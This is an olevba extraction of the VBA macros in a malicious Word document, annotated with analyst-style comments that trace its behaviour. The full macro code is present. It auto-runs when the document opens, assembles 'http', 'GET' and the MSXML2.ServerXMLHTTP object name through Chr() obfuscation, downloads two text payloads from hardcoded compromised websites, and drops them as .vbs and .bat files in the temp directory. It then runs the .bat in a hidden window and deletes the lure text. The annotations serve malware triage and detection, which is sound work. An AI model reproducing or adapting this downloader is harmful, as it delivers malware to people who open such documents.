- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB-V report~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: report~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: report~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point (olevba lists Auto_Open under AutoExec). Does nothing itself;
- ' it only hands control to Kuricknms, which leads to the main routine Subkaka.
- Sub Auto_Open()
- Kuricknms
- End Sub
- ' Trampoline shared by all three auto-exec entry points.
- ' The string assignment is filler: QJKHWDJKASD is not read anywhere in this dump.
- Sub Kuricknms()
- QJKHWDJKASD = "qjwhekj 12 gejhhkasjdh kg12hjdg ahjsgd"
- ' Hand off to the main download-and-drop routine.
- Subkaka
- End Sub
- ' Auto-exec entry point (olevba: runs when the Word document is opened).
- ' Same hand-off as Auto_Open and Workbook_Open.
- Sub AutoOpen()
- Kuricknms
- End Sub
- ' Main routine, reached from every auto-exec entry point via Kuricknms.
- ' Visible behaviour, in order:
- '   1. builds "http://" and a temp-directory path from Chr() arithmetic,
- '   2. fetches two .txt resources over HTTP (Module2.Huqwhdkjqwl),
- '   3. substitutes three placeholder words in the first response,
- '   4. splits the result on a "$$" marker and writes the halves to the temp
- '      directory as <random>.vbs and <random>.bat,
- '   5. runs the .bat through Shell with window style 0 (Module2.Fuflmdjoo),
- '   6. calls Module1.Hameleon to edit the visible document.
- ' Pivot points for triage that are visible in this block: the two host/path strings
- ' (STT1, STT2), the file names 66836487162.txt and sasa.txt, and numerically named
- ' .vbs/.bat files created in the temp directory by the Office process.
- Sub Subkaka()
- Dim NJKAWD As String, OOODJWD As String, SSPCKDSD As String
- Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String, STT2 As String
- Dim PBIn As String, KnsdD As Date, CONT As String
- Dim Ndjs As Integer
- Dim ABTH As String, BBTH As String
- Dim klmn As Integer, TTKK As String
- Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer
- ' The date is only a numeric seed: Year() of it feeds the Chr() arithmetic below.
- KnsdD = #2/12/2010#
- ' Chr(92) = "\" (path separator).
- SSPCKDSD = spb(90 + 0 + 2)
- ' Random numeric string; used below as the base name of both dropped files.
- NJKAWD = Samsung(9898)
- OOODJWD = "Temp"
- ' PH2 = Environ("Temp") + "\", i.e. the temp directory with a trailing separator.
- PH2 = Module1.Jkjdnda(OOODJWD) + SSPCKDSD
- ' File numbers used by the two Open ... For Output statements further down.
- ART = 315
- BFT = 316
- Randomize
- ' 2010 - 1906 = 104, so the next line yields Chr(104) Chr(116) Chr(116) Chr(112) = "http".
- Ndjs = Int(Year(KnsdD)) - 1906
- ATTH = hhr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + spb(8 + Ndjs)
- ATTH = ATTH + "://"
- ' ".txt" split in two, presumably to avoid a plain-text extension match.
- TSTS = ".tx" + "t"
- CDDD = "66836487162" + TSTS
- LNSS = "sasa" + TSTS
- ' This first value is overwritten on the next line and never used.
- STT1 = "site/"
- STT1 = "thebackpack.fr/w" + "p-content/themes/salient/wpbakery/js_composer/assets/lib/prettyphoto/images/prettyPhoto/light_rounded/"
- ' STT2 is assigned but not referenced again in this routine.
- ' NOTE(review): it looks like a second (fallback) location - keep it as a related indicator.
- STT2 = "obiectivhouse.ro/w" + "p-content/plugins/maintenance/load/images/fonts-icon/"
- ' First request: "http://" + STT1 + "66836487162.txt".
- PBIn = ATTH + STT1 + CDDD
- CONT = Module2.Huqwhdkjqwl(PBIn)
- ' Sanity check on the response: look for the word "exit" in its last 15 characters.
- BHJD = Right(CONT, 15)
- hdjshd = InStr(1, BHJD, "exit")
- If (hdjshd = 0) Then
- ' "exit" not found. NJKQWD is empty, so both URLs built here are "http://" + file name
- ' with no host. NOTE(review): STT2 was presumably meant to be used here - confirm
- ' against other samples of this family.
- NJKQWD = ""
- PBIn = ATTH + NJKQWD + CDDD
- CONT = Module2.Huqwhdkjqwl(PBIn)
- NFBH = Module2.Huqwhdkjqwl(ATTH + NJKQWD + LNSS)
- Else
- ' Second request: "http://" + STT1 + "sasa.txt"; the body is kept in NFBH.
- NFBH = Module2.Huqwhdkjqwl(ATTH + STT1 + LNSS)
- End If
- ' Wait about one second (busy loop in Module2.Crispy).
- Module2.Crispy (1)
- ' Placeholder words expected in the downloaded template.
- CPLRP1 = "pioneer"
- CPLRP2 = "paytina"
- CPLRP3 = "cr" & "anberry"
- ' "pioneer" -> temp directory path, "paytina" -> body of sasa.txt,
- ' "cranberry" -> the random base name.
- CONT = Replace(CONT, CPLRP1, PH2, 1)
- CONT = Replace(CONT, CPLRP2, NFBH, 1)
- CONT2 = Replace(CONT, CPLRP3, NJKAWD, 1)
- ' Find a "$$" pair: text before it goes to GEFORCE1, text after it to GEFORCE2.
- ' The loop has no early exit, so the last "$$" pair in the text decides the split.
- TTKK = "$"
- klmn = CInt(Len(CONT2))
- For i = 1 To klmn
- If (Mid(CONT2, i, 1) = TTKK) Then
- If (Mid(CONT2, i - 1, 1) = TTKK) Then
- GEFORCE1 = Mid(CONT2, 1, i - 2)
- GEFORCE2 = Mid(CONT2, i + 1, klmn - i)
- End If
- End If
- Next i
- ' Drop paths: <temp>\<random>.vbs and <temp>\<random>.bat.
- HQUJD = ".v"
- ABTH = PH2 + NJKAWD & HQUJD + "bs"
- BBTH = PH2 + NJKAWD + ".bat"
- ' Write the first half of the downloaded text to the .vbs file.
- Open ABTH For Output As #ART
- Print #ART, GEFORCE1
- Close #ART
- Module2.Crispy (1)
- ' Write the second half to the .bat file.
- Open BBTH For Output As #BFT
- Print #BFT, GEFORCE2
- Close #BFT
- Module2.Crispy (1)
- ' Execute the .bat via Shell(path, 0); the .vbs is not launched from this macro.
- ' NOTE(review): presumably the .bat starts the .vbs - its content is not part of this dump.
- QUHDQ = Module2.Fuflmdjoo(BBTH)
- ' Finally edit the visible document text (see Module1.Hameleon).
- Module1.Hameleon
- End Sub
- ' Auto-exec entry point (olevba lists Workbook_Open under AutoExec).
- ' The string assignment is filler; the only effect is the call to Kuricknms.
- Sub Workbook_Open()
- JHQDJBASND = "asdbj ashdksajhdjksa"
- Kuricknms
- End Sub
- ' Returns the responsetext property of the object passed in.
- ' Module2.Huqwhdkjqwl calls it with the HTTP request object after Send, which keeps
- ' the ".responsetext" access out of the function that makes the request.
- Public Function NHdjhasbdhas(a As Object)
- NHdjhasbdhas = (a.responsetext)
- End Function
- ' Returns a random whole number in the range a .. 1.5*a as a string.
- ' Subkaka calls it with 9898 and uses the result as the dropped files' base name,
- ' so the file names differ on every run.
- Public Function Samsung(a As Integer)
- Randomize
- Samsung = CStr(Int((a / 2 * Rnd) + a))
- End Function
- ' Thin wrapper around CreateObject(a).
- ' Not called by any procedure shown in this dump; it still contributes to olevba's
- ' "CreateObject" keyword hit.
- Public Function Creasqwdqwjdk(a As String)
- Creasqwdqwjdk = CreateObject(a)
- End Function
- ' Chr() wrapper: returns the character for code sps.
- ' One of three identical wrappers (spb, klmn, hhr) used to build strings from numbers.
- Public Function spb(sps As Integer)
- spb = Chr(sps)
- End Function
- ' Sgn() wrapper: returns the sign of a.
- ' Not called by any procedure shown in this dump.
- Public Function Stkjrhbs(a As Integer)
- Stkjrhbs = Sgn(a)
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: report~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Edits the visible document after the files have been dropped and the .bat started.
- ' Scans the document character by character for the first "k" that directly follows a
- ' "t", deletes everything from the start of the document up to that position, and sets
- ' the font colour of a following range to black.
- ' NOTE(review): presumably this removes the lure text and shows text that was
- ' previously not visible - confirm against the document body, which is not in this dump.
- Sub Hameleon()
- Dim ij As Integer
- Dim charCount As Integer
- charCount = ActiveDocument.Characters.Count - 1
- ' Marker characters: "t" immediately followed by "k". QJHWDSAD is filler.
- QJKDD = "k"
- QJHWDSAD = "qwdhjqwk dhkjd d"
- JFQW = "t"
- ij = 0
- Do While True
- ij = ij + 1
- If (ActiveDocument.Characters(ij) = QJKDD) Then
- ' Filler assignment; MBASNMDBW is not read.
- MBASNMDBW = "qwmdh njh1jaskjhdk h1klh adjks"
- If (ActiveDocument.Characters(ij - 1) = JFQW) Then
- ' Marker found: delete the leading part of the document, recolour the next range.
- ActiveDocument.Range(Start:=0, End:=ij).Delete
- ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack
- Exit Do
- End If
- End If
- ' Stop at the end of the document if the marker never appears.
- If (ij = charCount) Then
- Exit Do
- End If
- Loop
- End Sub
- ' Environ() wrapper: returns the value of environment variable sps.
- ' Subkaka calls it with "Temp" to find the drop directory. JKQHWDS is filler.
- Public Function Jkjdnda(sps As String)
- JKQHWDS = "wq,mnd,mn1djlkasjd kljddk12jdkl j"
- Jkjdnda = Environ(sps)
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: report~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Builds an n-character string from Chr() codes derived from Rnd.
- ' hduw is declared Integer, so the Rnd value is coerced to a whole number before use.
- ' Not called by any procedure shown in this dump; XQKLJDHJQ is filler.
- Public Function Kakarumba(n As Integer)
- Dim i As Integer
- Dim hduw As Integer
- For i = 1 To n Step 1
- Randomize
- hduw = Rnd
- Kakarumba = Kakarumba + hhr(Int(121 * hduw) + 90 + 7)
- Next i
- XQKLJDHJQ = "qwdkh2 k1hdlkjk21 dhjgasd"
- End Function
- ' Runs the command line a through Shell with window style 0 (hidden window).
- ' Subkaka passes the path of the dropped .bat file. The function assigns no return
- ' value; BJQHBDADS is filler.
- ' Detection note: this is the point where the Office process starts a child process.
- Public Function Fuflmdjoo(a As String)
- Dim bydd As Variant
- bydd = Shell(a, 0)
- BJQHBDADS = "asdhjk qdhjqkwhdk qwhdlkj dkhasd"
- End Function
- ' HTTP fetch helper: requests the URL in nbqjbdjqw and returns the response text.
- ' The COM ProgID and the HTTP verb are never written as literals; both are assembled
- ' from Chr() arithmetic and short fragments. As traced below they come out as
- ' "MSXML2.ServerXMLHTTP" and "GET".
- ' NOTE(review): one ProgID character comes from parsing the date string "6/3/06", so
- ' the result may depend on the host's date format - confirm in a sandbox run.
- Public Function Huqwhdkjqwl(nbqjbdjqw As String)
- Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, NNNMMHWDKJHAJSdsajgdh As Object, BHJQGWD As String
- Dim jahsghjJkhsd As String, dddc As Integer, QYDGGJASSSS As String, AsaHuhqdjhasd As String, hqudhhajs As String, AAHQJD As String
- ' The URL is copied through several variables; only jahsghjJkhsd is used for the request.
- AsaHuhqdjhasd = nbqjbdjqw
- JKAHJKSD = AsaHuhqdjhasd
- jahsghjJkhsd = AsaHuhqdjhasd
- 'asdhjsak dgashjdg as
- ' Roughly Chr(77) = "M", giving "ML2.S".
- JQHWD = Chr(Round(4.55, 1) + 0.4 + 72)
- HQUD = JQHWD + "L2.S"
- Dim hquwd As Date, ajsid As Integer
- ' Month of this date is 5; it is only used as a number.
- hquwd = #5/10/2011#
- ajsid = Int(Month(hquwd))
- Randomize
- ' 68 + month of ("6/3/06" plus one month). Read as day/month this is 68 + 4 = 72 = "H".
- BHJQWD = klmn(68 + Int(Month(DateAdd("m", 1, "6/3/06"))))
- ' dddc = 4 - 5 = -1.
- dddc = 4 - ajsid
- ' Chr(80) = "P".
- HQDUQ = hhr(Val(81 + dddc))
- ' Chr(77) = "M".
- hqudhhajs = klmn(Val(78 + dddc))
- ' "ML2.S" + "erver" + "XML" + "H", then + "TT" + "P" = "ML2.ServerXMLHTTP".
- BHQDHJWQDW = HQUD + "erver" + "XML" + BHJQWD
- BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ
- 'akjshdj ashdk sd
- 'asdhkajks dhajsgd
- ' Chr(71) + "E" + Chr(84) = "GET".
- QYDGGJASSSS = "E"
- NNNHDQYUWG = hhr(11 * 2 * 4 + 4 * dddc)
- QYDGGJASSSS = hhr(71) + QYDGGJASSSS & NNNHDQYUWG
- ' "M" + "SX" + "ML2.ServerXMLHTTP" = "MSXML2.ServerXMLHTTP".
- DWQJDIQWDKWQJDHBB = hqudhhajs + "SX" + BYGDWHQGWHDWQ
- 'asdhgajs gdhajsg dsa
- 'asdhgajs gdhajsg dsa
- ' Instantiate the HTTP client by the assembled ProgID.
- Set NNNMMHWDKJHAJSdsajgdh = CreateObject(DWQJDIQWDKWQJDHBB)
- 'anbdqmnbdqw bdnmq dqw
- ' Open <verb>, <url>, then send. BHJQGWD is never assigned, so the body is empty.
- NNNMMHWDKJHAJSdsajgdh.Open QYDGGJASSSS, jahsghjJkhsd
- NNNMMHWDKJHAJSdsajgdh.Send (BHJQGWD)
- ' Response text is read through ThisDocument.NHdjhasbdhas and returned unchanged.
- AAHQJD = ThisDocument.NHdjhasbdhas(NNNMMHWDKJHAJSdsajgdh)
- Huqwhdkjqwl = AAHQJD
- End Function
- ' Delay helper: loops on DoEvents until Timer has advanced by NSee seconds.
- ' Subkaka calls it with 1 between the download, the two file writes and the Shell call.
- ' QJKHWD is filler.
- Sub Crispy(NSee As Long)
- Dim NnSke As Long
- NnSke = Timer + NSee
- Do While Timer < NnSke
- DoEvents
- Loop
- QJKHWD = "asdjhjk qhdjq kwdh hd "
- End Sub
- ' Chr() wrapper: returns the character for code pag. Same body as spb and hhr.
- ' Note that Subkaka also declares a local Integer named klmn, which is unrelated.
- Public Function klmn(pag As Integer)
- klmn = Chr(pag)
- End Function
- ' Chr() wrapper: returns the character for code sps. Same body as spb and klmn.
- ' Used to spell out "http", "GET" and parts of the COM ProgID from numbers.
- Public Function hhr(sps As Integer)
- hhr = Chr(sps)
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Lib | May run code from a DLL (obfuscation: |
- | | | VBA expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------------+-----------------------------------------+